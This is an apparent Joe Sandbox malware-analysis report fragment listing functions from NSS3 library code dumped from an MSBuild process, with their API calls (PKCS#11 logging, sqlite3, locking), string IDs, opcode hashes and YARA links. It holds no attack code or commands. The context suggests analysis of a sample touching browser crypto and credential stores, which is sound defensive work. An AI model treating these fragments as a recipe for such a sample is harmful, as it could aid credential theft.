                                                                                        Function 6C6BADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C6BADE6
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6BAE17
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BAE29
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6BAE3F
                                                                                        • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C6BAE78
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BAE8A
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6BAEA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                                        • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$nyl
                                                                                        • API String ID: 332880674-862247975
                                                                                        • Opcode ID: 75497fa28d1b951e484bafa4cd13016fac4bdc9b03d1a7468263ec57dc78cd98
                                                                                        • Instruction ID: 9a3c24c106e48cd47fe68a3f99b64657df2ac331565b67c0880361e9a05f09ba
                                                                                        • Opcode Fuzzy Hash: 75497fa28d1b951e484bafa4cd13016fac4bdc9b03d1a7468263ec57dc78cd98
                                                                                        • Instruction Fuzzy Hash: 9431F872600118ABCB00DF54DD8CBAE77B5AB4A319F444434F408BB712DF30992ADBAA
                                                                                        Function 6C6BA650 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_MessageDecryptInit), ref: 6C6BA676
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6BA6A7
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BA6B9
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6BA6CF
                                                                                        • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C6BA708
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BA71A
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6BA730
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                                        • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptInit$nyl
                                                                                        • API String ID: 332880674-1173536456
                                                                                        • Opcode ID: 401ff3e2d5d7ce781a3ca4317179f60e5a23acb8bd851c3efa694108d2b0b63e
                                                                                        • Instruction ID: 58ae1500690d7d1870e9b17ce8361f83718f116d3de4c9c90c379242ece0c2de
                                                                                        • Opcode Fuzzy Hash: 401ff3e2d5d7ce781a3ca4317179f60e5a23acb8bd851c3efa694108d2b0b63e
                                                                                        • Instruction Fuzzy Hash: F331FA76601109ABC700DF54DD8CBAE37B5AB4A318F044434E5087B652DF309919CB9A
                                                                                        Function 6C6B2DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_InitPIN), ref: 6C6B2DF6
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B2E24
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B2E33
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B2E49
                                                                                        • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C6B2E68
                                                                                        • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C6B2E81
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$nyl
                                                                                        • API String ID: 1003633598-2977378113
                                                                                        • Opcode ID: 6564dad241c31e3c869a29d0a38b3085f0ac1c6c9725e18d0b95e20844653be9
                                                                                        • Instruction ID: 7f4a44d5418c0e6797b813f086880dac7da76bd173875a1f46f2b143959ac7e8
                                                                                        • Opcode Fuzzy Hash: 6564dad241c31e3c869a29d0a38b3085f0ac1c6c9725e18d0b95e20844653be9
                                                                                        • Instruction Fuzzy Hash: 7731FB72601119AFDB50DB55DE4CB8A3BB5EB4A31DF044034F808BB751DF309A5ACBAA
                                                                                        Function 6C6C6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C6C781D,00000000,6C6BBE2C,?,6C6C6B1D,?,?,?,?,00000000,00000000,6C6C781D), ref: 6C6C6C40
                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C6C781D,?,6C6BBE2C,?), ref: 6C6C6C58
                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C6C781D), ref: 6C6C6C6F
                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C6C6C84
                                                                                        • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C6C6C96
                                                                                          • Part of subcall function 6C671240: TlsGetValue.KERNEL32(00000040,?,6C67116C,NSPR_LOG_MODULES), ref: 6C671267
                                                                                          • Part of subcall function 6C671240: EnterCriticalSection.KERNEL32(?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C67127C
                                                                                          • Part of subcall function 6C671240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C671291
                                                                                          • Part of subcall function 6C671240: PR_Unlock.NSS3(?,?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C6712A0
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C6C6CAA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                        • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                        • API String ID: 4221828374-3736768024
                                                                                        • Opcode ID: 4c8d923b99ee0cbbd353d3ea38c9c798265d8e1924886d3ec5404d081fbc2961
                                                                                        • Instruction ID: 2d30d37ea2a93779e83e56cd5fd5e1867a4e79e21a91423874f49e178ef37175
                                                                                        • Opcode Fuzzy Hash: 4c8d923b99ee0cbbd353d3ea38c9c798265d8e1924886d3ec5404d081fbc2961
                                                                                        • Instruction Fuzzy Hash: 9D01A7F17023022BE51027795E4AF76269DDF81359F140531FE04E0941EA92E62440AF
                                                                                        Function 6C6D4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_SetErrorText.NSS3(00000000,00000000,?,6C6978F8), ref: 6C6D4E6D
                                                                                          • Part of subcall function 6C6709E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C6706A2,00000000,?), ref: 6C6709F8
                                                                                          • Part of subcall function 6C6709E0: malloc.MOZGLUE(0000001F), ref: 6C670A18
                                                                                          • Part of subcall function 6C6709E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C670A33
                                                                                        • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C6978F8), ref: 6C6D4ED9
                                                                                          • Part of subcall function 6C6C5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C6C7703,?,00000000,00000000), ref: 6C6C5942
                                                                                          • Part of subcall function 6C6C5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C6C7703), ref: 6C6C5954
                                                                                          • Part of subcall function 6C6C5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6C596A
                                                                                          • Part of subcall function 6C6C5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6C5984
                                                                                          • Part of subcall function 6C6C5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C6C5999
                                                                                          • Part of subcall function 6C6C5920: free.MOZGLUE(00000000), ref: 6C6C59BA
                                                                                          • Part of subcall function 6C6C5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C6C59D3
                                                                                          • Part of subcall function 6C6C5920: free.MOZGLUE(00000000), ref: 6C6C59F5
                                                                                          • Part of subcall function 6C6C5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C6C5A0A
                                                                                          • Part of subcall function 6C6C5920: free.MOZGLUE(00000000), ref: 6C6C5A2E
                                                                                          • Part of subcall function 6C6C5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C6C5A43
                                                                                        • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4EB3
                                                                                          • Part of subcall function 6C6D4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6D4EB8,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D484C
                                                                                          • Part of subcall function 6C6D4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6D4EB8,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D486D
                                                                                          • Part of subcall function 6C6D4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C6D4EB8,?), ref: 6C6D4884
                                                                                        • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4EC0
                                                                                          • Part of subcall function 6C6D4470: TlsGetValue.KERNEL32(00000000,?,6C697296,00000000), ref: 6C6D4487
                                                                                          • Part of subcall function 6C6D4470: EnterCriticalSection.KERNEL32(?,?,?,6C697296,00000000), ref: 6C6D44A0
                                                                                          • Part of subcall function 6C6D4470: PR_Unlock.NSS3(?,?,?,?,6C697296,00000000), ref: 6C6D44BB
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4F16
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4F2E
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4F40
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4F6C
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4F80
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4F8F
                                                                                        • PK11_UpdateSlotAttribute.NSS3(?,6C7ADCB0,00000000), ref: 6C6D4FFE
                                                                                        • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C6D501F
                                                                                        • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D506B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 560490210-0
                                                                                        • Opcode ID: 61b8834bdd2f6a7fb6e01b759f47a7fe8dc685e3f1f20112a78f9861e83aa845
                                                                                        • Instruction ID: 90f63cf26fdd55a8aa64422d47567bafa6dde7c9c49a6a9fdc3acaef77ccb70a
                                                                                        • Opcode Fuzzy Hash: 61b8834bdd2f6a7fb6e01b759f47a7fe8dc685e3f1f20112a78f9861e83aa845
                                                                                        • Instruction Fuzzy Hash: 495115F2D006069BEB119F24EC05AAA37B4FF0631DF160535EC0682A11FB31F955CADA
                                                                                        Function 6C67ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                        • String ID:
                                                                                        • API String ID: 786543732-0
                                                                                        • Opcode ID: bd60b63f7b98cbeeef40d7bae2477e2de889f6df1d2c05ad0a05b5401b5b79b8
                                                                                        • Instruction ID: 7f3e86bfae01b0785e2ca7d6b8d411e157f0802e52d1f63a415b3faaccbd3583
                                                                                        • Opcode Fuzzy Hash: bd60b63f7b98cbeeef40d7bae2477e2de889f6df1d2c05ad0a05b5401b5b79b8
                                                                                        • Instruction Fuzzy Hash: 4951D3B1E001169BDF10DF68DD456AE77B4BB0A349F140975D808A3B12DB31E945CBFA
                                                                                        Function 6C754C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • sqlite3_value_text16.NSS3(?), ref: 6C754CAF
                                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C754CFD
                                                                                        • sqlite3_value_text16.NSS3(?), ref: 6C754D44
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_text16$sqlite3_log
                                                                                        • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                        • API String ID: 2274617401-4033235608
                                                                                        • Opcode ID: 9d5c1fe09e99393d2ffb1b037710b34997c8628b5f2ba655317b5bc79be67e24
                                                                                        • Instruction ID: 9a161ddbe0c771c63e9db3b4d2ac4b2145efba569db4aabb1dea150a9ee8ce2d
                                                                                        • Opcode Fuzzy Hash: 9d5c1fe09e99393d2ffb1b037710b34997c8628b5f2ba655317b5bc79be67e24
                                                                                        • Instruction Fuzzy Hash: 5B317A73E08A156BE7044B28AB027E5736177C3318FD50535D9245BE18CF21AC71A3E6
                                                                                        Function 6C6B2CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_InitToken), ref: 6C6B2CEC
                                                                                        • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C6B2D07
                                                                                          • Part of subcall function 6C7909D0: PR_Now.NSS3 ref: 6C790A22
                                                                                          • Part of subcall function 6C7909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C790A35
                                                                                          • Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C790A66
                                                                                          • Part of subcall function 6C7909D0: PR_GetCurrentThread.NSS3 ref: 6C790A70
                                                                                          • Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C790A9D
                                                                                          • Part of subcall function 6C7909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C790AC8
                                                                                          • Part of subcall function 6C7909D0: PR_vsmprintf.NSS3(?,?), ref: 6C790AE8
                                                                                          • Part of subcall function 6C7909D0: EnterCriticalSection.KERNEL32(?), ref: 6C790B19
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790B48
                                                                                          • Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790C76
                                                                                          • Part of subcall function 6C7909D0: PR_LogFlush.NSS3 ref: 6C790C7E
                                                                                        • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C6B2D22
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790B88
                                                                                          • Part of subcall function 6C7909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C790C5D
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C790C8D
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790C9C
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790CD1
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C790CEC
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790CFB
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790D16
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C790D26
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790D35
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C790D65
                                                                                          • Part of subcall function 6C7909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C790D70
                                                                                          • Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790D90
                                                                                          • Part of subcall function 6C7909D0: free.MOZGLUE(00000000), ref: 6C790D99
                                                                                        • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C6B2D3B
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C790BAB
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790BBA
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790D7E
                                                                                        • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C6B2D54
                                                                                          • Part of subcall function 6C7909D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C790BCB
                                                                                          • Part of subcall function 6C7909D0: EnterCriticalSection.KERNEL32(?), ref: 6C790BDE
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790C16
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                        • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nyl
                                                                                        • API String ID: 420000887-2578169290
                                                                                        • Opcode ID: d7606ad809b7ba5159e3778546686992b5765966059c35d72a883e7f2f242273
                                                                                        • Instruction ID: aa22bb07288b8828b448e285c1615a7ee7f4b03418c65e71b1d3e3c7bfec93b0
                                                                                        • Opcode Fuzzy Hash: d7606ad809b7ba5159e3778546686992b5765966059c35d72a883e7f2f242273
                                                                                        • Instruction Fuzzy Hash: C521C576200145EFDB40DF94DE8CA853BF1EB4A31DF448134F604A7622DF319969DB66
                                                                                        Function 6C622450 Relevance: 19.2, APIs: 15, Instructions: 440COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6224BA
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C62250D
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C622554
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C6225A7
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C622609
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C62265F
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6226A2
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C6226F5
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C622764
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C622898
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6228D0
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C622948
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C62299B
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6229E2
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C622A31
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
